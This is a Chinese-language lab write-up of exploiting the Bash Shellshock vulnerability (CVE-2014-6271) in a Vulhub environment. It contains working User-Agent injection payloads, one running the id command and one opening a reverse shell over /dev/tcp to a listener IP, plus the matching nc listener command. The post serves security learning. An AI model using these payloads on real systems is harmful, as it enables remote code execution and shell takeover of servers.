Vulhub 中的 bash CVE-2014-6271

0x00 前言

声明:本文仅做学习交流,遵守《网络安全法》。

先学习原理,一个挺老的漏洞了。该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本,会影响到与Bash交互的多种应用,包括HTTP、OpenSSH、DHCP等。

总的来讲,攻击者通过控制变量进行远程代码执行。

0x01 CVE-2014-6271

先通过nmap进行端口扫描。

访问8080的时候发现是apache的主页面。

这样不行啊,这得扫描后台。

有新的收获。访问之后发现是很有名的 hello world。

要不是地址不同我还以为浏览器没什么变化呢。这怎么办?抓个包吧。在User-Agent处写上payload。

复制代码
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

成功看到用户id。那说明id这条命令已经被执行了,那就可以......

复制代码
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /bin/bash -i >& /dev/tcp/192.168.217.177/8888 0>&1

开启nc之后,构造上面的poc。

复制代码
nc -nlvp 8888

BurpSuite没有回显,但是nc有回显了。

0x02 总结

一开始执行id的时候是没有回显的,以为是Burp的包构造问题,后来发现是payload构造的有问题。另外,在回弹shell的时候,由于payload写的有问题导致回弹失败。 //多打了一个"/" 真丢人

相关推荐
志栋智能2 小时前
超自动化安全:构建智能安全运营的核心引擎
大数据·运维·服务器·数据库·安全·自动化·产品运营
星幻元宇VR3 小时前
VR航空航天科普设备【VR时空直升机】
科技·学习·安全·生活·vr
合天网安实验室3 小时前
记录一个免杀的php webshell demo
渗透测试·php·webshell·免杀
weixin_514253184 小时前
428-uitars tmux
安全·web安全
漠月瑾-西安5 小时前
软件忘了“擦黑板”:一次内核信息泄露事件(CVE-2024-49997)的深度剖析
网络安全·linux内核·内核安全·信息泄露·内存安全·cve漏洞分析
KKKlucifer7 小时前
日志审计与行为分析在安全服务中的应用实践
网络·人工智能·安全
ykjhr_3d10 小时前
vr电力安全培训系统有哪些
安全·vr·华锐视点
枷锁—sha10 小时前
【CTFshow-pwn系列】03_栈溢出【pwn 073】详解:静态编译下的自动化 ROP 链构建
网络·汇编·笔记·安全·网络安全·自动化
VBsemi-专注于MOSFET研发定制10 小时前
面向高可靠与能效需求的安全存储系统功率器件选型策略与适配手册
安全
xixixi7777710 小时前
AI安全周记:AI驱动攻击占比50%、PQC国标落地、ShinyHunters连环袭击——面对1:25的攻防成本鸿沟,防守方还能撑多久?
人工智能·安全·ai·大模型·aigc·量子计算·供应链